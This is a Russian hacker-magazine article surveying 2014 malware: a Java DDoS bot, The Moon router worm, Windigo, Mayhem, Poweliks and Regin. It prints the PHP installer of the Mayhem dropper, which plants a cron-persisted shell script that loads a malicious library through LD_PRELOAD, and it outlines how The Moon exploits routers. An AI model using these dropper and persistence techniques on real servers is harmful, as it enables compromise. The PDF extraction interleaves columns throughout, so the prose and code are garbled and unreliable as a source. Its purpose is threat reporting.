книги хакеры / журнал хакер / 192_Optimized

Основной функционал бота — проведение DDoS-атак. Управляющие

В ИТ-компании Team Cymru говорят, что обнаруженная ими ботсеть

команды принимают следующие параметры:

из стольких устройств является крупнейшей в своем роде. Стив Санторел-

• тип DDoS (поддерживаются только два вида — HTTP и UDP flood);

ли, сотрудник Team Cymru, рассказал, что факт существования ботсети

• адрес и порт жертвы;

из зараженных роутеров был установлен из-за наличия большого количе-

• длительность проведения атаки;

ства поддельных DNS-запросов со стороны конечных пользователей. Спе-

• количество порождаемых для DDoS потоков.

циалистов заинтересовало, что пользовательские устройства в массовом

порядке работают не с провайдерскими DNS, а со сторонними серверами.

При HTTP flood значение User-Agent, который будет вставлен в запрос,

Конечно же, такая большая ботсеть была явно сформирована не чер-

выбирается случайным образом из списка, хранящегося в теле бота в за-

вем, а в результате сканирования интернета на предмет наличия уязвимых

шифрованном виде. Это сделано, вероятно, для обхода систем обнаруже-

устройств через зараженные серверы и взлома при помощи эксплойтов.

ния DDoS-атак (рис. 1).

Само сканирование производится зараженными серверами, так как ка-

Как видно на примере двух рассмотренных образцов вредоносных при-

налов и вычислительных мощностей у них явно больше, чем у домашнего

ложений, применение для кодинга Java позволяет создавать кросс-плат-

маршрутизатора. Однако это показывает, насколько успешным может быть

форменные и пока трудно обнаруживаемые антивирусами трояны. Кстати,

атака червя, который будет распространяться через роутеры самостоя-

установку таких троянов удобно производить через эксплойт-паки, проби-

тельно. Кстати, живой пример такого червя уже был в 2012 году, это Carna.

вающие JRE, что логично: там, где был пробив, Java точно есть.

Он представлял собой вредоносный код, созданный с использованием ча-

РОУТЕРЫПОДУДАРОМ

сти исходников прошивки OpenWRT.

Последнее исследование компании Tripwire, проведенное в теперь уже

Как известно, ломают чаще всего то, что легко ломается. Сколько инфор-

прошлом году, показало, что 80% из топ-25 самых продаваемых в Amazon

мации опубликовано обо всяких дырах и бэкдорах в домашних маршру-

моделей беспроводных маршрутизаторов, которые используются рядо-

тизаторах? Не перечислить. Поэтому злоумышленники время от времени

выми пользователями и небольшими компаниями, уязвимы для хакерских

клепают самораспространяющиеся вредоносы, пытаясь повторить успех

атак. По данным Tripwire, 30% экспертов в области информационных тех-

знаменитого

червя

Морриса.

нологий и 46% рядовых пользова-

Как известно, его лавинообразное

телей даже не изменяют пароль

распространение

было

обуслов-

администратора,

установленный

лено крайне низкой планкой обе-

в устройстве по умолчанию.

спечения безопасности компьюте-

ТАКЛИВСЕБЕЗОБЛАЧНО

ров того времени. Нечто подобное

GCHQ

сейчас можно наблюдать для ши-

ВСРЕДЕLINUX?

рокого спектра сетевых устройств,

Несмотря на упорные мантры от-

как SOHO, так и корпоративного

Центр правительственной

связи (англ. Government

дельных красноглазиков, утверж-

сектора. К тому же в роутерах нет

Communications Headquarters, GCHQ) — спецслужба Вели-

дающих, что под Linux вредоносов

антивирусов.

кобритании, ответственная за ведение радиоэлектронной

быть не может, реальность дока-

Так, исследователи из институ-

разведки и за обеспечение защиты информации органов

зывает обратное. Как известно,

та SANS обнаружили червя, пора-

правительства и армии. Спецслужба была создана в 1919

большинство серверов в интер-

жающего маршрутизаторы Linksys.

году под названием Правительственная школа кодиро-

нете работает под

управлением

Червь получил название The Moon,

вания и шифрования (англ. Government Code and Cypher

*nix-подобных операционных си-

так как содержит внутри себя лого

School, GC&CS). Именно ее специалисты в ходе Второй

стем. Естественно, злоумышлен-

вымышленной

компании

Lunar

мировой войны смогли взломать немецкие коды «Энигма».

ники просто не могут обойти это

Industries из фильма The Moon 2009

В 1946 году центр получил свое текущее название. Многие

вниманием. Разумеется, план-

года.

сотрудники GCHQ стали учителями для специалистов NSA,

ка *nix-вредоносов изначально

В зависимости от версии про-

образованного только в 1952 году. С тех пор эти два ведом-

была довольно высокой. Если под

шивки червь инфицирует марш-

ства поддерживают самые тесные контакты. Например,

Windows процентов 80 вредонос-

рутизаторы: E4200, E3200, E3000,

в рамках операции под кодовым названием Tempora центр

ных программ написано дилетан-

E2500, E2100L,

E2000,

E1550,

перехватывает проходящий

через территорию Велико-

тами, то в *nix находят преимуще-

E1500, E1200, E1000 и E900. Чуть

британии международный интернет-трафик, предоставляя

ственно такие образцы, которые

позже было установлено, что уяз-

США доступ к полученной информации.

свидетельствуют

о

достаточно

вимыми также были модели E300,

высоком уровне знаний их разра-

WAG320N,

WAP300N,

WES610N,

ботчиков.

WAP610N,

WRT610N,

WRT400N,

В 2014 году опубликована ин-

WRT600N,

WRT320N,

WRT160N,

формация о нескольких вредонос-

WRT150N.

ных кампаниях, связанных именно

Предполагаемой жертве червь

с заражением *nix-систем.

посылает URL-запрос вида "/HNAP1/", который возвращает XML-файл с на-

Пример первый иллюстрирует ESET со своим расследованием опера-

стройками и версией прошивки. Такой запрос является частью протокола

ции, получившей название Windigo.

Home Network Administration Protocol, который был разработан Cisco и пред-

Эта операция началась как минимум в 2011 году, в ходе ее пострадали

назначен для управления сетевыми устройствами. Если информация о вер-

даже такие известные компании, как cPanel (разработчик одноименной па-

сии маршрутизатора и прошивке относится к уязвимому устройству, то The

нели управления хостингом) и kernel.org, которая обслуживает основной

Moon посылает на уязвимый CGI-скрипт маршрутизатора эксплойт для за-

репозиторий исходного кода ядра Linux.

грузки и выполнения своего тела. Уязвимый CGI-скрипт содержит ошиб-

Windigo была раскрыта ESET совместно с CERT-Bund, исследователь-

ку обработки авторизации, поэтому запрос посылается с логином admin

ским центром SNIC и европейской организацией ядерных исследований

и случайным паролем, так как эта проверка все равно не производится.

(CERN). Начальная фаза атаки серверов происходила без использования

Исполняемый код червя представляет собой бинарный файл формата ELF

каких-либо эксплойтов, вместо этого использовались зараженные вре-

(Executable and Linkable), скомпилированный для платформы MIPS. После

доносным содержимым дистрибутивы различного ПО для Linux, а также

успешного заражения The Moon начинает сканировать сеть в поисках дру-

учетные данные для входа на сервер, полученные от скомпрометированных

гих уязвимых устройств. Поиск производится по списку из 670 диапазонов

компьютеров пользователей. В дальнейшем данные учетных записей по-

(вида /21 или /24), который захардкожен внутри тела.

полнялись за счет зараженных серверов.

По утверждению исследователей SANS, внутри червя присутствует ме-

В ходе операции Windigo было задействовано несколько вредоносных

ханизм связи с командным сервером, однако попыток управления ботне-

программ, на стороне сервера это были:

том из маршрутизаторов зафиксировано не было. Специалисты считают,

• Linux/Ebury — root backdoor shell, предоставляет полный доступ к систе-

что было заражено порядка тысячи устройств. Распространение The Moon

ме через командную строку, а также имеет возможности по краже учет-

было замечено операторами одного из провайдеров штата Вайоминг, США,

ных данных SSH, может работать как на Linux, так и на FreeBSD-серверах;

которые и сообщили об этом в институт SANS.

• Linux/Cdorked — компрометирует веб-серверы под управлением Linux,

Конечно, можно сказать, что тысяча устройств — это не так уж и мно-

предоставляет полный доступ к системе через командную строку и от-

го. Хорошо, а как насчет 300 тысяч маршрутизаторов? Это звучит уже со-

вечает за заражение вредоносным кодом пользователей Windows, может

лиднее.

работать в среде Apache httpd, nginx и lighttpd;

Веб-серверы, зараженные Linux/Cdorked, перенаправляли пользовате-

$AU=@$_SERVER["SERVER_NAME"].$_SERVER["REQUEST_URI"];

лей Windows на серверы наборов эксплойтов (до осени 2013-го — Blackhole,

/* second stage dropper */

далее перешли на Neutrino), которые пытались скрытно загрузить один

$HBN=basename("/usr/bin/host");

из двух троянов, Win32/Boaxxe.G для организации кликфрода и Win32/

$SCP=getcwd();

Glupteba.M, выступающий в качестве сервиса прокси.

$SCR ="#!/bin/sh\ncd '".$SCP."'\nif [ -f

Кража учетных данных SSH была единственным способом, с помощью

'./libworker.so' ];then killall -9 $HBN;

которого обеспечивался доступ к новым серверам. Всего было два вариан-

export AU='".$AU."'\nexport LD_PRELOAD=./libworker.so\n/usr/

та кражи учетных данных SSH, реализуемых Linux/Ebury: когда пользователь

bin/host\nunset LD_PRELOAD\n";

совершает успешную операцию входа на зараженный сервер и когда поль-

$SCR .="crontab -l|grep -v '1\.sh'|grep -v crontab|crontab\

зователь использует зараженный сервер для входа в другую систему.

nfi\nrm 1.sh\nexit 0\n";

После того как украденные данные учетных записей оказывались в руках

@file_put_contents("1.sh", $SCR);

операторов Windigo, они проверялись на уровень

доступа. Если учетная запись не предоставляла

права root, сервер мог остаться нетронутым или

Рис. 2. Взаимодействие компонентов Windigo

на него устанавливался спам-бот Perl/Calfbot.

В противном случае (есть права root) на сервер

устанавливался Linux/Ebury. Если на скомпроме-

тированном сервере функционировал один или

несколько веб-сайтов, то в такую систему уста-

навливался Linux/Cdorked.

Общее количество серверов, зараженных

Linux/Cdorked, составило более двух тысяч, все-

го за последние два года были скомпрометиро-

ваны более 25 тысяч серверов.

Эксперты ESET отмечают, что вредоносные

программы, используемые в ходе операции

Windigo, разработаны на достаточно высоком

уровне: в них используются техники сокрытия

присутствия в системе, переносимость между

различными платформами, криптография, а так-

же они показывают высокий уровень познаний

атакующих в системе Linux.

Пример второй — компания «Яндекс» опу-

бликовала исследование вредоносного кода,

получившего название Mayhem.

Функционал вредоноса скрыт в библиотеке

libworker.so, которая загружается довольно ори-

гинальным образом. Инсталляция выполняется

при помощи вредоносного PHP-скрипта, кото-

рый размещается на сервере-жертве.

<?php

header("Content-type: text/plain");

print "2842123700\n";

if (! function_exists('file_put_con

2

tents')) {

function file_put_contents

($filename, $data) {

@chmod("1.sh", 0777);

$f = @fopen($filename, 'w');

/* try at now, file will be removed, crontab cleaned on suc

if (! $f)

cess */

return false;

@system("at now -f 1.sh", $ret);

$bytes = fwrite($f, $data);

if ($ret == 0) {

fclose($f);

for ($i = 0; $i < 5; $i++) {

return $bytes;

if (! @file_exists("1.sh")) {

}

print "AT success\n";

}

exit(0);

@system("killall -9 ".basename("/usr/bin/host"));

}

$so32 = <hex_body_of_library_for_x32>;

sleep(1);

$so64 = <hex_body_of_library_for_x64>;

}

$arch = 64;

}

if (intval("9223372036854775807") == 2147483647)

@system("(crontab -l|grep -v crontab;echo;echo '* * * * *

$arch = 32;

".$SCP."/1.sh')|crontab", $ret);

print "Arch is ".$arch."\n";

if ($ret == 0) {

$so = $arch == 32 ? $so32 : $so64;

for ($i = 0; $i < 62; $i++) {

$f = fopen("/usr/bin/host", "rb");

if (! @file_exists("1.sh")) {

if ($f) {

print "CRONTAB success\n";

$n = unpack("C*", fread($f, 8));

exit(0);

$so[7] = sprintf("%c", $n[8]);

}

print "System is ".($n[8] == 9 ? "FreeBSD" :

sleep(1);

"Linux")."\n";

}

мощи NTFS Alternate Data Streams, а если это не срабатывало, использовал-

этапом. Точно так же расшифровывались данные из блока конфигурации

ся вызов MoveFileEx() с параметром MOVEFILE_DELAY_UNTIL_REBOOT.

и загружались в память данные:

Впоследствии была выявлена другая версия Poweliks, которая исполь-

• x86 NTFS — из Alternate Data Streams;

зовала несколько иной метод сокрытия ключа своего автозапуска, а именно

• x86 FAT — из реестра;

удаляла у пользователя права на просмотр значения своего ключа.

• x64 — из последних секторов диска.

Самое интересное в этой истории то, что malware-исследователь, из-

вестный под ником Kafeine (его блог — malware.dontneedcoffee.com), об-

Только теперь данные расшифровывались при помощи 20 раундов алго-

ратил внимание, что код библиотек Poweliks в некоторых местах подозри-

ритма RC5 16-байтовым ключом и после этого подвергались декомпрессии

тельно напоминает код другого вредоноса — Alureon.GQ (Microsoft), он же

по алгоритму NRV2e.

Wowlik (ESET). Для тех, кому эти

Для

x86 конечный

резуль-

названия ничего не сказали, мож-

тат третьего этапа — менеджер

но привести другое, более рас-

VMEM.sys, содержащий

базовый

пространенное, — TDL или TDSS.

функционал для работы с зашиф-

Как видишь, часть его кода все

рованной виртуальной

файловой

еще гуляет по рукам (возможно,

системой (EVFS). Плагины Regin,

даже с его создателем, которого

конфигурационные файлы для них,

так и не нашли). Kafeine отмечает,

результаты работы в виде логов

что код, отвечающий за взаимо-

размещаются в одном файле-кон-

действие с C&C в Poweliks, выгля-

тейнере с расширением evt или

дит как своеобразный downgrade

imd, его размещение всегда было

кода,

используемого Alureon.GQ.

разным, но в основном его путь на-

По состоянию на февраль 2014-го

чинался

с C:\Windows\System32.

ботнет Poweliks насчитывал около

Файловая система чем-то напо-

30 тысяч зараженных машин (фор-

минает FAT, структура ее открыта,

мирование ботнета началось в но-

вместо имен файлов используют-

ябре 2013 года). Как видно, ботнет

ся числа, сами файлы шифруются

можно построить даже через рас-

тоже 16-байтным ключом с ис-

сылку писем с помощью старых

6

пользованием RC5 и компрессией

эксплойтов для Microsoft Word.

NRV2e. Менеджер VMEM.sys за-

Рис. 6. Распространенность Regin по странам

гружает из EVFS-контейнера дис-

ШПИОНСКИЕСТРАСТИ

петчер disp.dll (четвертый этап),

Волей-неволей, но придется упо-

который уже и является основным

мянуть очередное «кибероружие, сопоставимое по сложности со Stuxnet».

модулем, то есть обеспечивает сетевое взаимодействие с управляющим

Из-за чего, собственно,

шумиха? В конце ноября 2014 года Symantec

центром.

и Kaspersky опубликовали свои white paper о вредоносе Regin. И в этих ваших

Для x64 конечный результат третьего этапа — сразу диспетчер disp.dll,

интернетах снова что-то забурлило, совсем как в старые добрые времена.

который одновременно и драйвер для EVFS, и основной модуль взаимодей-

Что мы имеем с технической точки зрения? Забегая вперед, нужно от-

ствия. То есть тут сразу идет четвертый этап (без VMEM.sys), и disp.dll гру-

метить, что ни Symantec, ни Kaspersky пока еще (статья сдавалась в декабре

зится не из EVFS, а с последних секторов диска.

2014-го. — Прим. ред.) ничего не написали про дроппер (то есть они его так

Сетевое взаимодействие может осуществляться различными способами:

и не нашли). Описание почти сразу начинается с того, как производится за-

• HTTP и HTTPS, при этом данные передаются через cookie;

грузка Regin, которая состоит из нескольких этапов (рис. 5).

• RAW sockets, поддерживаются протоколы TCP и UDP;

На первом этапе грузится драйвер, зарегистрированный как сервис.

• ICMP, при этом в пакет ping для идентификации вставляется слово shit,

Для 64-разрядных ОС этот драйвер имел поддельную цифровую подпись

а для проверки контрольной суммы используется число 31 337;

от Microsoft или Broadcom. Причем дроппером в локальное хранилище вне-

• именованные каналы SMB.

дрялся сертификат доверенного CA злоумышленников, которым и были

подписаны поддельные подписи драйвера. Благодаря этому с точки зрения

Такое разнообразие используется для построения внутри ЛВС органи-

ОС с подписями было все ОК.

зации-жертвы своеобразной распределенной сети из зараженных Regin

Основная задача драйвера — загрузка другого компонента Regin, за-

машин. При этом одни экземпляры Regin могут выступать в качестве прокси

грузчика (этап два). Здесь уже начинаются различия для x86- и x64-систем.

для других экземпляров. Столь гибкая структура позволяет осуществлять

Для x86 данные (представлявшие собой зашифрованный бинарный код),

управление даже в случае, если компьютер с Regin изолирован от интерне-

которые загружал драйвер, могли размещаться в одном из двух мест.

та на уровне сетевых устройств.

В случае если файловая система была NTFS, данные разбивались на блоки

Список плагинов включает в себя стандартный шпионский набор для по-

фиксированного размера (из которых потом собирался единый блок дан-

лучения следующей информации:

ных) и хранились в Alternate Data

Streams следующих каталогов:

•

%Windir%;

Рис. 7. Волны распространения Stuxnet

•

%Windir%\fonts;

•

%Windir%\cursors.

Если же ФС была FAT, то данные

хранились в ключе реестра. Метод

хранения данных,

необходимые

пути или значения ключей реестра

размещались

в

зашифрованном

блоке

конфигурации

драйвера

первоначальной загрузки. Для x64

в качестве хранилища использова-

лось свободное место на диске, ко-

торое находилось сразу после всех

разделов. Данные, загружаемые

драйвером,

расшифровывались

простейшим алгоритмом, исполь-

зовавшим операцию XOR.

Полученный

на

втором этапе

бинарный код (загрузчик) произ-

водил действия, сходные с первым

7